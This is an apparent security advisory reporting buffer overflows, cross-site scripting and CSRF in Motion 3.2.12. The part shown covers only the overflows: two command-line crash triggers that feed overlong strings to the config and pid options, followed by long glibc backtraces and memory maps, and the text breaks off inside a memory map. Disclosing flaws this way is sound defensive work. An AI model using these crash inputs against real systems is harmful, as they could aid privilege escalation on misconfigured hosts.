BUG: Multiple Vulnerabilities
Motion 3.2.12 is prone to multiple vulnerabilities. These vulnerabilities are Buffer Overflows, Cross Site Scripting and Cross Site Request Forgery.
Buffer Overflows:
Supplying a long filename to the config and pid parameters of the "motion" binary will result in a buffer overflow. The cause of this is, is the unsafe C function strcpy() where no boundary checking is done to prevent overflowing the buffer.
This in theory could be abused to escalate privileges if the suid/sgid flag is set on the motion binary (not default on most operating systems as far as I know)
Below how to replicate the bugs:
# motion -c `python -c 'print "\x41"*1000'`
*** buffer overflow detected ***: motion terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x45)[0xb6876045]
/lib/i386-linux-gnu/libc.so.6(+0x102e1a)[0xb6874e1a]
/lib/i386-linux-gnu/libc.so.6(+0x10227f)[0xb687427f]
motion[0x804c0bb]
motion[0x8050e95]
motion[0x804c624]
motion[0x804aff6]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb678b4d3]
motion[0x804b761]
======= Memory map: ========
08048000-0807c000 r-xp 00000000 08:11 13111448 /usr/bin/motion
0807c000-0807d000 r--p 00033000 08:11 13111448 /usr/bin/motion
0807d000-08080000 rw-p 00034000 08:11 13111448 /usr/bin/motion
08080000-080a5000 rw-p 00000000 00:00 0
0981e000-0983f000 rw-p 00000000 00:00 0 [heap]
b5a4f000-b5a53000 rw-p 00000000 00:00 0
b5a53000-b5a5b000 r-xp 00000000 08:11 12719664 /lib/i386-linux-gnu/libcrypt-2.15.so
b5a5b000-b5a5c000 r--p 00007000 08:11 12719664 /lib/i386-linux-gnu/libcrypt-2.15.so
b5a5c000-b5a5d000 rw-p 00008000 08:11 12719664 /lib/i386-linux-gnu/libcrypt-2.15.so
b5a5d000-b5a84000 rw-p 00000000 00:00 0
b5a84000-b5b26000 r-xp 00000000 08:11 13108909 /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b26000-b5b27000 r--p 000a2000 08:11 13108909 /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b27000-b5b28000 rw-p 000a3000 08:11 13108909 /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b28000-b5b29000 rw-p 00000000 00:00 0
b5b29000-b5b6c000 r-xp 00000000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5b6c000-b5b6d000 ---p 00043000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5b6d000-b5b6e000 r--p 00043000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5b6e000-b5b70000 rw-p 00044000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5b70000-b5b7d000 r-xp 00000000 08:11 13108903 /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5b7d000-b5b7e000 r--p 0000c000 08:11 13108903 /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5b7e000-b5b7f000 rw-p 0000d000 08:11 13108903 /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5b7f000-b5b80000 rw-p 00000000 00:00 0
b5b80000-b5ba7000 r-xp 00000000 08:11 13108905 /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5ba7000-b5ba8000 r--p 00027000 08:11 13108905 /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5ba8000-b5ba9000 rw-p 00028000 08:11 13108905 /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5ba9000-b5bac000 r-xp 00000000 08:11 12714896 /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5bac000-b5bad000 r--p 00002000 08:11 12714896 /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5bad000-b5bae000 rw-p 00003000 08:11 12714896 /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5bae000-b5bbe000 r-xp 00000000 08:11 13111180 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5bbe000-b5bbf000 r--p 0000f000 08:11 13111180 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5bbf000-b5bc0000 rw-p 00010000 08:11 13111180 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5bc0000-b5bd0000 r-xp 00000000 08:11 13111207 /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5bd0000-b5bd1000 r--p 0000f000 08:11 13111207 /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5bd1000-b5bd2000 rw-p 00010000 08:11 13111207 /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5bd2000-b5be6000 r-xp 00000000 08:11 13108877 /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5be6000-b5be7000 r--p 00013000 08:11 13108877 /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5be7000-b5be8000 rw-p 00014000 08:11 13108877 /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5be8000-b5be9000 rw-p 00000000 00:00 0
b5be9000-b5c1b000 r-xp 00000000 08:11 13108881 /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c1b000-b5c1c000 r--p 00032000 08:11 13108881 /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c1c000-b5c1d000 rw-p 00033000 08:11 13108881 /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c1d000-b5c1e000 rw-p 00000000 00:00 0
b5c1e000-b5cbe000 r-xp 00000000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5cbe000-b5cbf000 ---p 000a0000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5cbf000-b5cc0000 r--p 000a0000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5cc0000-b5cc3000 rw-p 000a1000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5cc3000-b5d42000 r-xp 00000000 08:11 13108911 /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d42000-b5d44000 r--p 0007e000 08:11 13108911 /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d44000-b5d46000 rw-p 00080000 08:11 13108911 /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d46000-b5d4c000 r-xp 00000000 08:11 13108913 /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5d4c000-b5d4d000 r--p 00005000 08:11 13108913 /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5d4d000-b5d4e000 rw-p 00006000 08:11 13108913 /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5d4e000-b5dd0000 r-xp 00000000 08:11 12714905 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5dd0000-b5dd1000 r--p 00081000 08:11 12714905 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5dd1000-b5dd3000 rw-p 00082000 08:11 12714905 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5dd3000-b5dd4000 rw-p 00000000 00:00 0
b5dd4000-b5e93000 r-xp 00000000 08:11 13109922 /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5e93000-b5e97000 r--p 000be000 08:11 13109922 /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5e97000-b5e98000 rw-p 000c2000 08:11 13109922 /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5e98000-b5ed2000 r-xp 00000000 08:11 13108915 /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5ed2000-b5ed3000 r--p 00039000 08:11 13108915 /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5ed3000-b5ed5000 rw-p 0003a000 08:11 13108915 /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5ed5000-b5eef000 r-xp 00000000 08:11 13107884 /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5eef000-b5ef0000 r--p 00019000 08:11 13107884 /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5ef0000-b5ef1000 rw-p 0001a000 08:11 13107884 /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5ef1000-b5efe000 r-xp 00000000 08:11 13107938 /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5efe000-b5eff000 r--p 0000c000 08:11 13107938 /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5eff000-b5f00000 rw-p 0000d000 08:11 13107938 /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5f00000-b5f13000 r-xp 00000000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f13000-b5f14000 ---p 00013000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f14000-b5f15000 r--p 00013000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f15000-b5f16000 rw-p 00014000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f16000-b5f19000 rw-p 00000000 00:00 0
b5f19000-b5f1b000 r-xp 00000000 08:11 12714027 /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f1b000-b5f1c000 r--p 00002000 08:11 12714027 /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f1c000-b5f1d000 rw-p 00003000 08:11 12714027 /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f1d000-b5f24000 r-xp 00000000 08:11 13108893 /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f24000-b5f25000 r--p 00006000 08:11 13108893 /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f25000-b5f26000 rw-p 00007000 08:11 13108893 /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f26000-b5f4c000 r-xp 00000000 08:11 13108889 /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5f4c000-b5f4d000 r--p 00025000 08:11 13108889 /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5f4d000-b5f4e000 rw-p 00026000 08:11 13108889 /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5f4e000-b5f51000 r-xp 00000000 08:11 12719678 /lib/i386-linux-gnu/libdl-2.15.so
b5f51000-b5f52000 r--p 00002000 08:11 12719678 /lib/i386-linux-gnu/libdl-2.15.so
b5f52000-b5f53000 rw-p 00003000 08:11 12719678 /lib/i386-linux-gnu/libdl-2.15.so
b5f53000-b5f6f000 r-xp 00000000 08:11 12714074 /lib/i386-linux-gnu/libgcc_s.so.1
b5f6f000-b5f70000 r--p 0001b000 08:11 12714074 /lib/i386-linux-gnu/libgcc_s.so.1
b5f70000-b5f71000 rw-p 0001c000 08:11 12714074 /lib/i386-linux-gnu/libgcc_s.so.1
b5f71000-b5f72000 rw-p 00000000 00:00 0
b5f72000-b5ffd000 r-xp 00000000 08:11 13109480 /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b5ffd000-b5ffe000 r--p 0008a000 08:11 13109480 /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b5ffe000-b6002000 rw-p 0008b000 08:11 13109480 /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b6002000-b6008000 r-xp 00000000 08:11 13111258 /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b6008000-b6009000 r--p 00005000 08:11 13111258 /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b6009000-b600a000 rw-p 00006000 08:11 13111258 /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b600a000-b6058000 r-xp 00000000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b6058000-b6059000 ---p 0004e000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b6059000-b605a000 r--p 0004e000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b605a000-b605b000 rw-p 0004f000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b605b000-b605c000 rw-p 00000000 00:00 0
b605c000-b6097000 r-xp 00000000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b6097000-b6098000 ---p 0003b000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b6098000-b6099000 r--p 0003b000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b6099000-b609a000 rw-p 0003c000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b609a000-b609d000 r-xp 00000000 08:11 12714018 /lib/i386-linux-gnu/libcom_err.so.2.1
b609d000-b609e000 r--p 00002000 08:11 12714018 /lib/i386-linux-gnu/libcom_err.so.2.1
b609e000-b609f000 rw-p 00003000 08:11 12714018 /lib/i386-linux-gnu/libcom_err.so.2.1
b609f000-b60a0000 rw-p 00000000 00:00 0
b60a0000-b6168000 r-xp 00000000 08:11 13108891 /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b6168000-b616e000 r--p 000c7000 08:11 13108891 /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b616e000-b616f000 rw-p 000cd000 08:11 13108891 /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b616f000-b6301000 r-xp 00000000 08:11 12714013 /lib/i386-linux-gnu/libcrypto.so.1.0.0
b6301000-b6310000 r--p 00192000 08:11 12714013 /lib/i386-linux-gnu/libcrypto.so.1.0.0
b6310000-b6317000 rw-p 001a1000 08:11 12714013 /lib/i386-linux-gnu/libcrypto.so.1.0.0
b6317000-b631a000 rw-p 00000000 00:00 0
b631a000-b6369000 r-xp 00000000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b6369000-b636a000 ---p 0004f000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b636a000-b636c000 r--p 0004f000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b636c000-b6370000 rw-p 00051000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b6370000-b6380000 r-xp 00000000 08:11 13107507 /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b6380000-b6381000 r--p 0000f000 08:11 13107507 /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b6381000-b6382000 rw-p 00010000 08:11 13107507 /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b6382000-b6386000 rw-p 00000000 00:00 0
b6386000-b6392000 r-xp 00000000 08:11 13107504 /usr/lib/libgsm.so.1.0.12
b6392000-b6393000 r--p 0000b000 08:11 13107504 /usr/lib/libgsm.so.1.0.12
b6393000-b6394000 rw-p 0000c000 08:11 13107504 /usr/lib/libgsm.so.1.0.12
b6394000-b6395000 rw-p 00000000 00:00 0
b6395000-b6450000 r-xp 00000000 08:11 13107498 /usr/lib/libschroedinger-1.0.so.0.11.0
b6450000-b6452000 r--p 000ba000 08:11 13107498 /usr/lib/libschroedinger-1.0.so.0.11.0
b6452000-b6453000 rw-p 000bc000 08:11 13107498 /usr/lib/libschroedinger-1.0.so.0.11.0
b6453000-b6472000 r-xp 00000000 08:11 13109963 /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b6472000-b6473000 r--p 0001e000 08:11 13109963 /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b6473000-b6474000 rw-p 0001f000 08:11 13109963 /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b6474000-b648f000 r-xp 00000000 08:11 13110244 /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b648f000-b6490000 r--p 0001a000 08:11 13110244 /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b6490000-b6491000 rw-p 0001b000 08:11 13110244 /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b6491000-b64d0000 r-xp 00000000 08:11 13110245 /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b64d0000-b64d1000 r--p 0003f000 08:11 13110245 /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b64d1000-b64d2000 rw-p 00040000 08:11 13110245 /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b64d2000-b64fb000 r-xp 00000000 08:11 13109670 /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b64fb000-b64fc000 r--p 00028000 08:11 13109670 /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b64fc000-b64fd000 rw-p 00029000 08:11 13109670 /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b64fd000-b64fe000 rw-p 00000000 00:00 0
b64fe000-b6664000 r-xp 00000000 08:11 13109643 /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b6664000-b6675000 r--p 00165000 08:11 13109643 /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b6675000-b6676000 rw-p 00176000 08:11 13109643 /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b6676000-b6712000 r-xp 00000000 08:11 13110019 /usr/lib/libvpx.so.1.0.0
b6712000-b6713000 r--p 0009c000 08:11 13110019 /usr/lib/libvpx.so.1.0.0
b6713000-b6714000 rw-p 0009d000 08:11 13110019 /usr/lib/libvpx.so.1.0.0
b6714000-b671e000 rw-p 00000000 00:00 0
b671e000-b6732000 r-xp 00000000 08:11 12714015 /lib/i386-linux-gnu/libz.so.1.2.3.4
b6732000-b6733000 r--p 00013000 08:11 12714015 /lib/i386-linux-gnu/libz.so.1.2.3.4
b6733000-b6734000 rw-p 00014000 08:11 12714015 /lib/i386-linux-gnu/libz.so.1.2.3.4
b6734000-b6743000 r-xp 00000000 08:11 12714930 /lib/i386-linux-gnu/libbz2.so.1.0.4
b6743000-b6744000 r--p 0000e000 08:11 12714930 /lib/i386-linux-gnu/libbz2.so.1.0.4
b6744000-b6745000 rw-p 0000f000 08:11 12714930 /lib/i386-linux-gnu/libbz2.so.1.0.4
b6745000-b676f000 r-xp 00000000 08:11 12719674 /lib/i386-linux-gnu/libm-2.15.so
b676f000-b6770000 r--p 00029000 08:11 12719674 /lib/i386-linux-gnu/libm-2.15.so
b6770000-b6771000 rw-p 0002a000 08:11 12719674 /lib/i386-linux-gnu/libm-2.15.so
b6771000-b6772000 rw-p 00000000 00:00 0
b6772000-b6915000 r-xp 00000000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b6915000-b6916000 ---p 001a3000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b6916000-b6918000 r--p 001a3000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b6918000-b6919000 rw-p 001a5000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b6919000-b691c000 rw-p 00000000 00:00 0
b691c000-b6943000 r-xp 00000000 08:11 13107298 /usr/lib/libpq.so.5.4
b6943000-b6944000 r--p 00027000 08:11 13107298 /usr/lib/libpq.so.5.4
b6944000-b6945000 rw-p 00028000 08:11 13107298 /usr/lib/libpq.so.5.4
b6945000-b6962000 r-xp 00000000 08:11 13241057 /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b6962000-b6963000 r--p 0001c000 08:11 13241057 /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b6963000-b6964000 rw-p 0001d000 08:11 13241057 /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b6964000-b6967000 rw-p 00000000 00:00 0
b6967000-b7045000 r-xp 00000000 08:11 13243408 /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b7045000-b7046000 r--p 006de000 08:11 13243408 /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b7046000-b7055000 rw-p 006df000 08:11 13243408 /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b7055000-b75c3000 rw-p 00000000 00:00 0
b75c3000-b76d0000 r-xp 00000000 08:11 13243406 /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b76d0000-b76d1000 r--p 0010c000 08:11 13243406 /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b76d1000-b76d9000 rw-p 0010d000 08:11 13243406 /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b76d9000-b76da000 rw-p 00000000 00:00 0
b76da000-b76fc000 r-xp 00000000 08:11 13108788 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b76fc000-b76fd000 r--p 00022000 08:11 13108788 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b76fd000-b76fe000 rw-p 00023000 08:11 13108788 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b76fe000-b7715000 r-xp 00000000 08:11 12719672 /lib/i386-linux-gnu/libpthread-2.15.so
b7715000-b7716000 r--p 00016000 08:11 12719672 /lib/i386-linux-gnu/libpthread-2.15.so
b7716000-b7717000 rw-p 00017000 08:11 12719672 /lib/i386-linux-gnu/libpthread-2.15.so
b7717000-b7719000 rw-p 00000000 00:00 0
b7726000-b7729000 rw-p 00000000 00:00 0
b7729000-b772a000 r-xp 00000000 00:00 0 [vdso]
b772a000-b774a000 r-xp 00000000 08:11 12719675 /lib/i386-linux-gnu/ld-2.15.so
b774a000-b774b000 r--p 0001f000 08:11 12719675 /lib/i386-linux-gnu/ld-2.15.so
b774b000-b774c000 rw-p 00020000 08:11 12719675 /lib/i386-linux-gnu/ld-2.15.so
bfbb6000-bfbd7000 rw-p 00000000 00:00 0 [stack]
Aborted
# motion -p /tmp/`python -c 'print "\x41"*5000'`
*** buffer overflow detected ***: motion terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x45)[0xb68cf045]
/lib/i386-linux-gnu/libc.so.6(+0x102e1a)[0xb68cde1a]
/lib/i386-linux-gnu/libc.so.6(+0x10214d)[0xb68cd14d]
motion[0x805012b]
motion[0x8050c00]
motion[0x804c624]
motion[0x804aff6]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb67e44d3]
motion[0x804b761]
======= Memory map: ========
08048000-0807c000 r-xp 00000000 08:11 13111448 /usr/bin/motion
0807c000-0807d000 r--p 00033000 08:11 13111448 /usr/bin/motion
0807d000-08080000 rw-p 00034000 08:11 13111448 /usr/bin/motion
08080000-080a5000 rw-p 00000000 00:00 0
082bf000-082e0000 rw-p 00000000 00:00 0 [heap]
b5aa8000-b5aac000 rw-p 00000000 00:00 0
b5aac000-b5ab4000 r-xp 00000000 08:11 12719664 /lib/i386-linux-gnu/libcrypt-2.15.so
b5ab4000-b5ab5000 r--p 00007000 08:11 12719664 /lib/i386-linux-gnu/libcrypt-2.15.so
b5ab5000-b5ab6000 rw-p 00008000 08:11 12719664 /lib/i386-linux-gnu/libcrypt-2.15.so
b5ab6000-b5add000 rw-p 00000000 00:00 0
b5add000-b5b7f000 r-xp 00000000 08:11 13108909 /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b7f000-b5b80000 r--p 000a2000 08:11 13108909 /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b80000-b5b81000 rw-p 000a3000 08:11 13108909 /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b81000-b5b82000 rw-p 00000000 00:00 0
b5b82000-b5bc5000 r-xp 00000000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5bc5000-b5bc6000 ---p 00043000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5bc6000-b5bc7000 r--p 00043000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5bc7000-b5bc9000 rw-p 00044000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5bc9000-b5bd6000 r-xp 00000000 08:11 13108903 /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5bd6000-b5bd7000 r--p 0000c000 08:11 13108903 /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5bd7000-b5bd8000 rw-p 0000d000 08:11 13108903 /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5bd8000-b5bd9000 rw-p 00000000 00:00 0
b5bd9000-b5c00000 r-xp 00000000 08:11 13108905 /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5c00000-b5c01000 r--p 00027000 08:11 13108905 /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5c01000-b5c02000 rw-p 00028000 08:11 13108905 /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5c02000-b5c05000 r-xp 00000000 08:11 12714896 /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5c05000-b5c06000 r--p 00002000 08:11 12714896 /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5c06000-b5c07000 rw-p 00003000 08:11 12714896 /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5c07000-b5c17000 r-xp 00000000 08:11 13111180 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5c17000-b5c18000 r--p 0000f000 08:11 13111180 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5c18000-b5c19000 rw-p 00010000 08:11 13111180 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5c19000-b5c29000 r-xp 00000000 08:11 13111207 /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5c29000-b5c2a000 r--p 0000f000 08:11 13111207 /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5c2a000-b5c2b000 rw-p 00010000 08:11 13111207 /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5c2b000-b5c3f000 r-xp 00000000 08:11 13108877 /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5c3f000-b5c40000 r--p 00013000 08:11 13108877 /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5c40000-b5c41000 rw-p 00014000 08:11 13108877 /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5c41000-b5c42000 rw-p 00000000 00:00 0
b5c42000-b5c74000 r-xp 00000000 08:11 13108881 /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c74000-b5c75000 r--p 00032000 08:11 13108881 /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c75000-b5c76000 rw-p 00033000 08:11 13108881 /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c76000-b5c77000 rw-p 00000000 00:00 0
b5c77000-b5d17000 r-xp 00000000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5d17000-b5d18000 ---p 000a0000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5d18000-b5d19000 r--p 000a0000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5d19000-b5d1c000 rw-p 000a1000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5d1c000-b5d9b000 r-xp 00000000 08:11 13108911 /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d9b000-b5d9d000 r--p 0007e000 08:11 13108911 /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d9d000-b5d9f000 rw-p 00080000 08:11 13108911 /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d9f000-b5da5000 r-xp 00000000 08:11 13108913 /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5da5000-b5da6000 r--p 00005000 08:11 13108913 /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5da6000-b5da7000 rw-p 00006000 08:11 13108913 /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5da7000-b5e29000 r-xp 00000000 08:11 12714905 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5e29000-b5e2a000 r--p 00081000 08:11 12714905 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5e2a000-b5e2c000 rw-p 00082000 08:11 12714905 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5e2c000-b5e2d000 rw-p 00000000 00:00 0
b5e2d000-b5eec000 r-xp 00000000 08:11 13109922 /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5eec000-b5ef0000 r--p 000be000 08:11 13109922 /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5ef0000-b5ef1000 rw-p 000c2000 08:11 13109922 /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5ef1000-b5f2b000 r-xp 00000000 08:11 13108915 /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5f2b000-b5f2c000 r--p 00039000 08:11 13108915 /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5f2c000-b5f2e000 rw-p 0003a000 08:11 13108915 /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5f2e000-b5f48000 r-xp 00000000 08:11 13107884 /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5f48000-b5f49000 r--p 00019000 08:11 13107884 /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5f49000-b5f4a000 rw-p 0001a000 08:11 13107884 /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5f4a000-b5f57000 r-xp 00000000 08:11 13107938 /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5f57000-b5f58000 r--p 0000c000 08:11 13107938 /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5f58000-b5f59000 rw-p 0000d000 08:11 13107938 /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5f59000-b5f6c000 r-xp 00000000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f6c000-b5f6d000 ---p 00013000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f6d000-b5f6e000 r--p 00013000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
